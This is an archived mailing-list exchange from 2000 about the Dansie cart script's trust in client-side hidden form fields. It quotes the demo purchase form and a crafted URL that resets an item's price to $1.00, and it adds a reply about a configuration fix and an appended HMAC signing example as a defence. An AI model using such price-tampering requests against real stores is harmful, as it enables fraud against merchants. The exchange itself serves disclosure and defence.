Subject: Re: more problems with that POS dansie cart software!
From: Pete Holsberg (pjhMCCC.EDU)
Date: Sun Apr 16 2000 - 17:45:58 CDT


On Fri, 14 Apr 2000, tombow wrote:

> if installing a backdoor in the cart software wasn't bad enough.. the
> whole implementation of pricing and adding items to cart is crap..
>
> example form to add items to your cart (kindly provided on the publisher's
> site using the demo cart they set up for us):
>
> *snip*
>
> <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
>
> Black Leather purse with leather straps<BR>
> Price: $20.00<BR>
>
> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling -->
> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
>
> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
> </FORM>
>
> *snip*
>
>
> a couple of quick alterations and we can now add:
>
> one piece of crap cart software..
>
> http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
>

This occurs because the person who configured the script
failed to set "personal variable #66". Dansie has since
done that at www.dansie.net so that the above URL now fails
to change the shopping cart variables.

Pete
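
An added example, not Dansie's code and not written by anyone in this thread: one way a cart script can reject altered hidden fields is for the server to sign the price-relevant fields with an HMAC when the form is generated and verify that tag on submission. The key, the `sig` field and the function names are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

# Constructed key for this example; a real deployment keeps it server-side only.
SECRET_KEY = b"example-key-not-for-production"

# Fields whose values decide what the customer is charged.
SIGNED_FIELDS = ("name", "price", "sh")


def sign_item(fields):
    """Return the hex HMAC-SHA256 tag over the price-relevant fields."""
    # Length-prefix each value so "ab"+"c" and "a"+"bc" cannot collide.
    msg = b"".join(
        f"{len(fields[k].encode())}:".encode() + fields[k].encode()
        for k in SIGNED_FIELDS
    )
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def accept_item(query_string):
    """Parse a submitted form body or query string; return the item or None."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    # Reject missing or repeated fields instead of guessing which one counts.
    if any(len(parsed.get(k, [])) != 1 for k in SIGNED_FIELDS + ("sig",)):
        return None
    fields = {k: parsed[k][0] for k in SIGNED_FIELDS}
    # Compare as bytes in constant time; a str with non-ASCII would raise.
    if not hmac.compare_digest(sign_item(fields).encode(), parsed["sig"][0].encode()):
        return None
    return fields


# The merchant's item from the quoted form, signed when the page is generated.
ITEM = {"name": "Black leather purse", "price": "20.00", "sh": "1"}
GOOD = urlencode({**ITEM, "sig": sign_item(ITEM)})
# The price changed after signing, as in the altered request quoted above.
TAMPERED = urlencode({**ITEM, "price": "1.00", "sig": sign_item(ITEM)})
# The altered fields from the quoted URL, which carry no signature at all.
UNSIGNED = "name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg"

if __name__ == "__main__":
    for label, qs in (("good", GOOD), ("tampered", TAMPERED), ("unsigned", UNSIGNED)):
        print(label, accept_item(qs))
```

Unsigned display fields such as `img` and `custom1` are ignored by the check, so they remain client-controlled and must not influence the charge.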